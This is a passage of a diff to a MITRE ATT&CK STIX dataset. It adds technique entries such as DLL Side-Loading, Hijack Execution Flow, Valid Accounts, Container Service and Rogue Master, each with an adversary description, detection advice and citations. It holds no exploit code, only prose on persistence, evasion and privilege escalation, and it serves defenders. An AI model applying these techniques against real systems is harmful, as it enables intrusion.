checksum of the operating system file with the checksum of a known good copy from a trusted source. Some embedded network device platforms may have the capability to calculate the checksum of the file, while others may not. Even for those platforms that have the capability, it is recommended to download a copy of the file to a trusted computer to calculate the checksum with software that is not compromised. (Citation: Cisco IOS Software Integrity Assurance - Image File Verification)\n\nMany vendors of embedded network devices can provide advanced debugging support that will allow them to work with device owners to validate the integrity of the operating system running in memory. If a compromise of the operating system is suspected, contact the vendor technical support and seek such services for a more thorough inspection of the current running system. (Citation: Cisco IOS Software Integrity Assurance - Run-Time Memory Verification)", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Network" + ], + "x_mitre_version": "1.0", + "x_mitre_data_sources": [], + "x_mitre_permissions_required": [ + "Administrator" + ], + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--ae7f3575-0a5e-427e-991b-fe03ad44c754", + "created": "2020-10-19T19:42:19.740Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1601", + "external_id": "T1601" + }, + { + "source_name": "Cisco IOS Software Integrity Assurance - Image File Verification", + "description": "Cisco. (n.d.). Cisco IOS Software Integrity Assurance - Cisco IOS Image File Verification. Retrieved October 19, 2020.", + "url": "https://tools.cisco.com/security/center/resources/integrity_assurance.html#7" + }, + { + "source_name": "Cisco IOS Software Integrity Assurance - Run-Time Memory Verification", + "description": "Cisco. (n.d.). Cisco IOS Software Integrity Assurance - Cisco IOS Run-Time Memory Integrity Verification. Retrieved October 19, 2020.", + "url": "https://tools.cisco.com/security/center/resources/integrity_assurance.html#13" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2023-11-21T20:02:33.404Z", + "name": "Hijack Execution Flow", + "description": "Adversaries may execute their own malicious payloads by hijacking the way operating systems run programs. Hijacking execution flow can be for the purposes of persistence, since this hijacked execution may reoccur over time. Adversaries may also use these mechanisms to elevate privileges or evade defenses, such as application control or other restrictions on execution.\n\nThere are many ways an adversary may hijack the flow of execution, including by manipulating how the operating system locates programs to be executed. How the operating system locates libraries to be used by a program can also be intercepted. Locations where the operating system looks for programs/resources, such as file directories and in the case of Windows the Registry, could also be poisoned to include malicious payloads.", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "persistence" + }, + { + "kill_chain_name": "mitre-attack", + "phase_name": "privilege-escalation" + }, + { + "kill_chain_name": "mitre-attack", + "phase_name": "defense-evasion" + } + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_contributors": [], + "x_mitre_deprecated": false, + "x_mitre_detection": "Monitor file systems for moving, renaming, replacing, or modifying DLLs. Changes in the set of DLLs that are loaded by a process (compared with past behavior) that do not correlate with known software, patches, etc., are suspicious. Monitor DLLs loaded into a process and detect DLLs that have the same file name but abnormal paths. Modifications to or creation of .manifest and .local redirection files that do not correlate with software updates are suspicious.\n\nLook for changes to binaries and service executables that may normally occur during software updates. If an executable is written, renamed, and/or moved to match an existing service executable, it could be detected and correlated with other suspicious behavior. Hashing of binaries and service executables could be used to detect replacement against historical data.\n\nMonitor for changes to environment variables, as well as the commands to implement these changes.\n\nMonitor processes for unusual activity (e.g., a process that does not use the network begins to do so, abnormal process call trees). Track library metadata, such as a hash, and compare libraries that are loaded at process execution time against previous executions to detect differences that do not correlate with patching or updates.\n\nService changes are reflected in the Registry. Modification to existing services should not occur frequently. If a service binary path or failure parameters are changed to values that are not typical for that service and does not correlate with software updates, then it may be due to malicious activity. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as network connections made for Command and Control, learning details about the environment through Discovery, and Lateral Movement.\n\nTools such as Sysinternals Autoruns may also be used to detect system changes that could be attempts at persistence, including listing current service information. (Citation: Autoruns for Windows) Suspicious program execution through services may show up as outlier processes that have not been seen before when compared against historical data.", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Linux", + "macOS", + "Windows" + ], + "x_mitre_version": "1.2", + "x_mitre_data_sources": [], + "x_mitre_defense_bypassed": [ + "Anti-virus", + "Application Control" + ], + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--aedfca76-3b30-4866-b2aa-0f1d7fd1e4b6", + "created": "2020-03-12T20:38:12.465Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1574", + "external_id": "T1574" + }, + { + "source_name": "Autoruns for Windows", + "description": "Mark Russinovich. (2019, June 28). Autoruns for Windows v13.96. Retrieved March 13, 2020.", + "url": "https://docs.microsoft.com/en-us/sysinternals/downloads/autoruns" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2022-05-24T14:00:00.188Z", + "name": "Indicator Removal from Tools", + "description": "Adversaries may remove indicators from tools if they believe their malicious tool was detected, quarantined, or otherwise curtailed. They can modify the tool by removing the indicator and using the updated version that is no longer detected by the target's defensive systems or subsequent targets that may use similar systems.\n\nA good example of this is when malware is detected with a file signature and quarantined by anti-virus software. An adversary who can determine that the malware was quarantined because of its file signature may modify the file to explicitly avoid that signature, and then re-use the malware.", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "defense-evasion" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_contributors": [], + "x_mitre_deprecated": false, + "x_mitre_detection": "The first detection of a malicious tool may trigger an anti-virus or other security tool alert. Similar events may also occur at the boundary through network IDS, email scanning appliance, etc. The initial detection should be treated as an indication of a potentially more invasive intrusion. The alerting system should be thoroughly investigated beyond that initial alert for activity that was not detected. Adversaries may continue with an operation, assuming that individual events like an anti-virus detect will not be investigated or that an analyst will not be able to conclusively link that event to other activity occurring on the network.", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": true, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Linux", + "macOS", + "Windows" + ], + "x_mitre_version": "1.1", + "x_mitre_data_sources": [], + "x_mitre_defense_bypassed": [ + "Anti-virus", + "Host intrusion prevention systems", + "Log analysis", + "Signature-based detection" + ], + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--b0533c6e-8fea-4788-874f-b799cacc4b92", + "created": "2020-03-19T21:27:32.820Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1027/005", + "external_id": "T1027.005" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2023-10-13T17:57:08.992Z", + "name": "Graphical User Interface", + "description": "Adversaries may attempt to gain access to a machine via a Graphical User Interface (GUI) to enhance execution capabilities. Access to a GUI allows a user to interact with a computer in a more visual manner than a CLI. A GUI allows users to move a cursor and click on interface objects, with a mouse and keyboard as the main input devices, as opposed to just using the keyboard.\n\nIf physical access is not an option, then access might be possible via protocols such as VNC on Linux-based and Unix-based operating systems, and RDP on Windows operating systems. An adversary can use this access to execute programs and applications on the target machine.", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-ics-attack", + "phase_name": "execution" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_contributors": [], + "x_mitre_deprecated": false, + "x_mitre_detection": "", + "x_mitre_domains": [ + "ics-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "None" + ], + "x_mitre_version": "1.1", + "x_mitre_data_sources": [ + "Process: Process Creation", + "Command: Command Execution", + "Module: Module Load", + "Logon Session: Logon Session Creation" + ], + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--b0628bfc-5376-4a38-9182-f324501cb4cf", + "created": "2020-05-21T17:43:26.506Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T0823", + "external_id": "T0823" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2022-04-25T14:00:00.188Z", + "name": "Malicious Image", + "description": "Adversaries may rely on a user running a malicious image to facilitate execution. Amazon Web Services (AWS) Amazon Machine Images (AMIs), Google Cloud Platform (GCP) Images, and Azure Images as well as popular container runtimes such as Docker can be backdoored. Backdoored images may be uploaded to a public repository via [Upload Malware](https://attack.mitre.org/techniques/T1608/001), and users may then download and deploy an instance or container from the image without realizing the image is malicious, thus bypassing techniques that specifically achieve Initial Access. This can lead to the execution of malicious code, such as code that executes cryptocurrency mining, in the instance or container.(Citation: Summit Route Malicious AMIs)\n\nAdversaries may also name images a certain way to increase the chance of users mistakenly deploying an instance or container from the image (ex: [Match Legitimate Name or Location](https://attack.mitre.org/techniques/T1036/005)).(Citation: Aqua Security Cloud Native Threat Report June 2021)", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "execution" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_contributors": [ + "Center for Threat-Informed Defense (CTID)", + "Vishwas Manral, McAfee" + ], + "x_mitre_detection": "Monitor the local image registry to make sure malicious images are not added. Track the deployment of new containers, especially from newly built images. Monitor the behavior of containers within the environment to detect anomalous behavior or malicious activity after users deploy from malicious images.", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": true, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "IaaS", + "Containers" + ], + "x_mitre_version": "1.1", + "x_mitre_data_sources": [], + "x_mitre_permissions_required": [ + "User" + ], + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--b0c74ef9-c61e-4986-88cb-78da98a355ec", + "created": "2021-03-30T17:20:05.789Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1204/003", + "external_id": "T1204.003" + }, + { + "source_name": "Summit Route Malicious AMIs", + "description": "Piper, S.. (2018, September 24). Investigating Malicious AMIs. Retrieved March 30, 2021.", + "url": "https://summitroute.com/blog/2018/09/24/investigating_malicious_amis/" + }, + { + "source_name": "Aqua Security Cloud Native Threat Report June 2021", + "description": "Team Nautilus. (2021, June). Attacks in the Wild on the Container Supply Chain and Infrastructure. Retrieved August 26, 2021.", + "url": "https://info.aquasec.com/hubfs/Threat%20reports/AquaSecurity_Cloud_Native_Threat_Report_2021.pdf?utm_campaign=WP%20-%20Jun2021%20Nautilus%202021%20Threat%20Research%20Report&utm_medium=email&_hsmi=132931006&_hsenc=p2ANqtz-_8oopT5Uhqab8B7kE0l3iFo1koirxtyfTehxF7N-EdGYrwk30gfiwp5SiNlW3G0TNKZxUcDkYOtwQ9S6nNVNyEO-Dgrw&utm_content=132931006&utm_source=hs_automation" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2024-04-16T12:35:38.832Z", + "name": "Container Service", + "description": "Adversaries may create or modify container or container cluster management tools that run as daemons, agents, or services on individual hosts. These include software for creating and managing individual containers, such as Docker and Podman, as well as container cluster node-level agents such as kubelet. By modifying these services, an adversary may be able to achieve persistence or escalate their privileges on a host.\n\nFor example, by using the `docker run` or `podman run` command with the `restart=always` directive, a container can be configured to persistently restart on the host.(Citation: AquaSec TeamTNT 2023) A user with access to the (rootful) docker command may also be able to escalate their privileges on the host.(Citation: GTFOBins Docker)\n\nIn Kubernetes environments, DaemonSets allow an adversary to persistently [Deploy Container](https://attack.mitre.org/techniques/T1610)s on all nodes, including ones added later to the cluster.(Citation: Aquasec Kubernetes Attack 2023)(Citation: Kubernetes DaemonSet) Pods can also be deployed to specific nodes using the `nodeSelector` or `nodeName` fields in the pod spec.(Citation: Kubernetes Assigning Pods to Nodes)(Citation: AppSecco Kubernetes Namespace Breakout 2020)\n\nNote that containers can also be configured to run as [Systemd Service](https://attack.mitre.org/techniques/T1543/002)s.(Citation: Podman Systemd)(Citation: Docker Systemd)", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "persistence" + }, + { + "kill_chain_name": "mitre-attack", + "phase_name": "privilege-escalation" + } + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_contributors": [], + "x_mitre_deprecated": false, + "x_mitre_detection": "", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": true, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Containers" + ], + "x_mitre_version": "1.0", + "x_mitre_data_sources": [], + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--b0e54bf7-835e-4f44-bd8e-62f431b9b76a", + "created": "2024-02-15T13:41:46.784Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1543/005", + "external_id": "T1543.005" + }, + { + "source_name": "AppSecco Kubernetes Namespace Breakout 2020", + "description": "Abhisek Datta. (2020, March 18). Kubernetes Namespace Breakout using Insecure Host Path Volume — Part 1. Retrieved January 16, 2024.", + "url": "https://blog.appsecco.com/kubernetes-namespace-breakout-using-insecure-host-path-volume-part-1-b382f2a6e216" + }, + { + "source_name": "Docker Systemd", + "description": "Docker. (n.d.). Start containers automatically. Retrieved February 15, 2024.", + "url": "https://docs.docker.com/config/containers/start-containers-automatically/" + }, + { + "source_name": "GTFOBins Docker", + "description": "GTFOBins. (n.d.). docker. Retrieved February 15, 2024.", + "url": "https://gtfobins.github.io/gtfobins/docker/" + }, + { + "source_name": "Kubernetes Assigning Pods to Nodes", + "description": "Kubernetes. (n.d.). Assigning Pods to Nodes. Retrieved February 15, 2024.", + "url": "https://kubernetes.io/docs/concepts/scheduling-eviction/assign-pod-node/" + }, + { + "source_name": "Kubernetes DaemonSet", + "description": "Kubernetes. (n.d.). DaemonSet. Retrieved February 15, 2024.", + "url": "https://kubernetes.io/docs/concepts/workloads/controllers/daemonset/" + }, + { + "source_name": "Aquasec Kubernetes Attack 2023", + "description": "Michael Katchinskiy, Assaf Morag. (2023, April 21). First-Ever Attack Leveraging Kubernetes RBAC to Backdoor Clusters. Retrieved July 14, 2023.", + "url": "https://blog.aquasec.com/leveraging-kubernetes-rbac-to-backdoor-clusters" + }, + { + "source_name": "AquaSec TeamTNT 2023", + "description": "Ofek Itach and Assaf Morag. (2023, July 13). TeamTNT Reemerged with New Aggressive Cloud Campaign. Retrieved February 15, 2024.", + "url": "https://blog.aquasec.com/teamtnt-reemerged-with-new-aggressive-cloud-campaign" + }, + { + "source_name": "Podman Systemd", + "description": "Valentin Rothberg. (2022, March 16). How to run pods as systemd services with Podman. Retrieved February 15, 2024.", + "url": "https://www.redhat.com/sysadmin/podman-run-pods-systemd-services" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2023-10-13T17:57:09.193Z", + "name": "Rogue Master", + "description": "Adversaries may setup a rogue master to leverage control server functions to communicate with outstations. A rogue master can be used to send legitimate control messages to other control system devices, affecting processes in unintended ways. It may also be used to disrupt network communications by capturing and receiving the network traffic meant for the actual master. Impersonating a master may also allow an adversary to avoid detection. \n\nIn the case of the 2017 Dallas Siren incident, adversaries used a rogue master to send command messages to the 156 distributed sirens across the city, either through a single rogue transmitter with a strong signal, or using many distributed repeaters. (Citation: Bastille April 2017) (Citation: Zack Whittaker April 2017)", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-ics-attack", + "phase_name": "initial-access" + } + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_contributors": [], + "x_mitre_deprecated": false, + "x_mitre_detection": "", + "x_mitre_domains": [ + "ics-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "None" + ], + "x_mitre_version": "1.2", + "x_mitre_data_sources": [ + "Network Traffic: Network Traffic Flow", + "Operational Databases: Device Alarm", + "Network Traffic: Network Traffic Content", + "Application Log: Application Log Content" + ], + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--b14395bd-5419-4ef4-9bd8-696936f509bb", + "created": "2020-05-21T17:43:26.506Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T0848", + "external_id": "T0848" + }, + { + "source_name": "Bastille April 2017", + "description": "Bastille 2017, April 17 Dallas Siren Attack Retrieved. 2020/11/06 ", + "url": "https://www.bastille.net/blogs/2017/4/17/dallas-siren-attack" + }, + { + "source_name": "Zack Whittaker April 2017", + "description": "Zack Whittaker 2017, April 12 Dallas' emergency sirens were hacked with a rogue radio signal Retrieved. 2020/11/06 ", + "url": "https://www.zdnet.com/article/experts-think-they-know-how-dallas-emergency-sirens-were-hacked/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2023-05-09T14:00:00.188Z", + "name": "Valid Accounts", + "description": "Adversaries may obtain and abuse credentials of existing accounts as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Compromised credentials may be used to bypass access controls placed on various resources on systems within the network and may even be used for persistent access to remote systems and externally available services, such as VPNs, Outlook Web Access, network devices, and remote desktop.(Citation: volexity_0day_sophos_FW) Compromised credentials may also grant an adversary increased privilege to specific systems or access to restricted areas of the network. Adversaries may choose not to use malware or tools in conjunction with the legitimate access those credentials provide to make it harder to detect their presence.\n\nIn some cases, adversaries may abuse inactive accounts: for example, those belonging to individuals who are no longer part of an organization. Using these accounts may allow the adversary to evade detection, as the original account user will not be present to identify any anomalous activity taking place on their account.(Citation: CISA MFA PrintNightmare)\n\nThe overlap of permissions for local, domain, and cloud accounts across a network of systems is of concern because the adversary may be able to pivot across accounts and systems to reach a high level of access (i.e., domain or enterprise administrator) to bypass access controls set within the enterprise.(Citation: TechNet Credential Theft)", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "defense-evasion" + }, + { + "kill_chain_name": "mitre-attack", + "phase_name": "persistence" + }, + { + "kill_chain_name": "mitre-attack", + "phase_name": "privilege-escalation" + }, + { + "kill_chain_name": "mitre-attack", + "phase_name": "initial-access" + } + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_contributors": [ + "Syed Ummar Farooqh, McAfee", + "Prasad Somasamudram, McAfee", + "Sekhar Sarukkai, McAfee", + "Jon Sternstein, Stern Security", + "Yossi Weizman, Azure Defender Research Team", + "Netskope", + "Mark Wee", + "Praetorian", + "Goldstein Menachem" + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "Configure robust, consistent account activity audit policies across the enterprise and with externally accessible services.(Citation: TechNet Audit Policy) Look for suspicious account behavior across systems that share accounts, either user, admin, or service accounts. Examples: one account logged into multiple systems simultaneously; multiple accounts logged into the same machine simultaneously; accounts logged in at odd times or outside of business hours. Activity may be from interactive login sessions or process ownership from accounts being used to execute binaries on a remote system as a particular account. Correlate other security systems with login information (e.g., a user has an active login session but has not entered the building or does not have VPN access).\n\nPerform regular audits of domain and local system accounts to detect accounts that may have been created by an adversary for persistence. Checks on these accounts could also include whether default accounts such as Guest have been activated. These audits should also include checks on any appliances and applications for default credentials or SSH keys, and if any are discovered, they should be updated immediately.", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows", + "Azure AD", + "Office 365", + "SaaS", + "IaaS", + "Linux", + "macOS", + "Google Workspace", + "Containers", + "Network" + ], + "x_mitre_version": "2.6", + "x_mitre_data_sources": [], + "x_mitre_defense_bypassed": [ + "Firewall", + "Anti-virus", + "Host Intrusion Prevention Systems", + "Network Intrusion Detection System", + "Application Control", + "System Access Controls" + ], + "x_mitre_effective_permissions": [ + "User", + "Administrator" + ], + "x_mitre_permissions_required": [ + "User", + "Administrator" + ], + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--b17a1a56-e99c-403c-8948-561df0cffe81", + "created": "2017-05-31T21:31:00.645Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1078", + "external_id": "T1078" + }, + { + "source_name": "volexity_0day_sophos_FW", + "description": "Adair, S., Lancaster, T., Volexity Threat Research. (2022, June 15). DriftingCloud: Zero-Day Sophos Firewall Exploitation and an Insidious Breach. Retrieved July 1, 2022.", + "url": "https://www.volexity.com/blog/2022/06/15/driftingcloud-zero-day-sophos-firewall-exploitation-and-an-insidious-breach/" + }, + { + "source_name": "CISA MFA PrintNightmare", + "description": "Cybersecurity and Infrastructure Security Agency. (2022, March 15). Russian State-Sponsored Cyber Actors Gain Network Access by Exploiting Default Multifactor Authentication Protocols and “PrintNightmare” Vulnerability. Retrieved March 16, 2022.", + "url": "https://www.cisa.gov/uscert/ncas/alerts/aa22-074a" + }, + { + "source_name": "TechNet Credential Theft", + "description": "Microsoft. (2016, April 15). Attractive Accounts for Credential Theft. Retrieved June 3, 2016.", + "url": "https://technet.microsoft.com/en-us/library/dn535501.aspx" + }, + { + "source_name": "TechNet Audit Policy", + "description": "Microsoft. (2016, April 15). Audit Policy Recommendations. Retrieved June 3, 2016.", + "url": "https://technet.microsoft.com/en-us/library/dn487457.aspx" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2023-10-31T14:00:00.188Z", + "name": "Non-Standard Port", + "description": "Adversaries may communicate using a protocol and port pairing that are typically not associated. For example, HTTPS over port 8088(Citation: Symantec Elfin Mar 2019) or port 587(Citation: Fortinet Agent Tesla April 2018) as opposed to the traditional port 443. Adversaries may make changes to the standard port used by a protocol to bypass filtering or muddle analysis/parsing of network data.\n\nAdversaries may also make changes to victim systems to abuse non-standard ports. For example, Registry keys and other configuration settings can be used to modify protocol and port pairings.(Citation: change_rdp_port_conti)", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "command-and-control" + } + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_contributors": [], + "x_mitre_deprecated": false, + "x_mitre_detection": "Analyze packet contents to detect communications that do not follow the expected protocol behavior for the port that is being used. Analyze network data for uncommon data flows (e.g., a client sending significantly more data than it receives from a server). Processes utilizing the network that do not normally have network communication or have never been seen before are suspicious.(Citation: University of Birmingham C2)", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Linux", + "macOS", + "Windows" + ], + "x_mitre_version": "1.1", + "x_mitre_data_sources": [], + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--b18eae87-b469-4e14-b454-b171b416bc18", + "created": "2020-03-14T18:18:32.443Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1571", + "external_id": "T1571" + }, + { + "source_name": "University of Birmingham C2", + "description": "Gardiner, J., Cova, M., Nagaraja, S. (2014, February). Command & Control Understanding, Denying and Detecting. Retrieved April 20, 2016.", + "url": "https://arxiv.org/ftp/arxiv/papers/1408/1408.1136.pdf" + }, + { + "source_name": "Symantec Elfin Mar 2019", + "description": "Security Response attack Investigation Team. (2019, March 27). Elfin: Relentless Espionage Group Targets Multiple Organizations in Saudi Arabia and U.S.. Retrieved April 10, 2019.", + "url": "https://www.symantec.com/blogs/threat-intelligence/elfin-apt33-espionage" + }, + { + "source_name": "change_rdp_port_conti", + "description": "The DFIR Report. (2022, March 1). \"Change RDP port\" #ContiLeaks. Retrieved March 1, 2022.", + "url": "https://twitter.com/TheDFIRReport/status/1498657772254240768" + }, + { + "source_name": "Fortinet Agent Tesla April 2018", + "description": "Zhang, X. (2018, April 05). Analysis of New Agent Tesla Spyware Variant. Retrieved November 5, 2018.", + "url": "https://www.fortinet.com/blog/threat-research/analysis-of-new-agent-tesla-spyware-variant.html" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2022-04-25T14:00:00.188Z", + "name": "Social Media Accounts", + "description": "Adversaries may create and cultivate social media accounts that can be used during targeting. Adversaries can create social media accounts that can be used to build a persona to further operations. Persona development consists of the development of public information, presence, history and appropriate affiliations.(Citation: NEWSCASTER2014)(Citation: BlackHatRobinSage)\n\nFor operations incorporating social engineering, the utilization of a persona on social media may be important. These personas may be fictitious or impersonate real people. The persona may exist on a single social media site or across multiple sites (ex: Facebook, LinkedIn, Twitter, etc.). Establishing a persona on social media may require development of additional documentation to make them seem real. This could include filling out profile information, developing social networks, or incorporating photos. \n\nOnce a persona has been developed an adversary can use it to create connections to targets of interest. These connections may be direct or may include trying to connect through others.(Citation: NEWSCASTER2014)(Citation: BlackHatRobinSage) These accounts may be leveraged during other phases of the adversary lifecycle, such as during Initial Access (ex: [Spearphishing via Service](https://attack.mitre.org/techniques/T1566/003)).", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "resource-development" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_contributors": [], + "x_mitre_detection": "Consider monitoring social media activity related to your organization. Suspicious activity may include personas claiming to work for your organization or recently created/modified accounts making numerous connection requests to accounts affiliated with your organization.\n\nDetection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access (ex: [Spearphishing via Service](https://attack.mitre.org/techniques/T1566/003)).", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": true, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "PRE" + ], + "x_mitre_version": "1.1", + "x_mitre_data_sources": [], + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--b1ccd744-3f78-4a0e-9bb2-2002057f7928", + "created": "2020-10-01T01:08:41.124Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1585/001", + "external_id": "T1585.001" + }, + { + "source_name": "NEWSCASTER2014", + "description": "Lennon, M. (2014, May 29). Iranian Hackers Targeted US Officials in Elaborate Social Media Attack Operation. Retrieved March 1, 2017.", + "url": "https://www.securityweek.com/iranian-hackers-targeted-us-officials-elaborate-social-media-attack-operation" + }, + { + "source_name": "BlackHatRobinSage", + "description": "Ryan, T. (2010). “Getting In Bed with Robin Sage.”. Retrieved March 6, 2017.", + "url": "http://media.blackhat.com/bh-us-10/whitepapers/Ryan/BlackHat-USA-2010-Ryan-Getting-In-Bed-With-Robin-Sage-v1.0.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2022-04-25T14:00:00.188Z", + "name": "DLL Side-Loading", + "description": "Programs may specify DLLs that are loaded at runtime. Programs that improperly or vaguely specify a required DLL may be open to a vulnerability in which an unintended DLL is loaded. Side-loading vulnerabilities specifically occur when Windows Side-by-Side (WinSxS) manifests (Citation: MSDN Manifests) are not explicit enough about characteristics of the DLL to be loaded. Adversaries may take advantage of a legitimate program that is vulnerable to side-loading to load a malicious DLL. (Citation: Stewart 2014)\n\nAdversaries likely use this technique as a means of masking actions they perform under a legitimate, trusted system or software process.", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "defense-evasion" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_contributors": [], + "x_mitre_detection": "Monitor processes for unusual activity (e.g., a process that does not use the network begins to do so). Track DLL metadata, such as a hash, and compare DLLs that are loaded at process execution time against previous executions to detect differences that do not correlate with patching or updates.", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_version": "1.0", + "x_mitre_data_sources": [], + "x_mitre_defense_bypassed": [ + "Process whitelisting", + "Anti-virus" + ], + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--b2001907-166b-4d71-bb3c-9d26c871de09", + "created": "2017-05-31T21:30:58.007Z", + "created_by_ref": 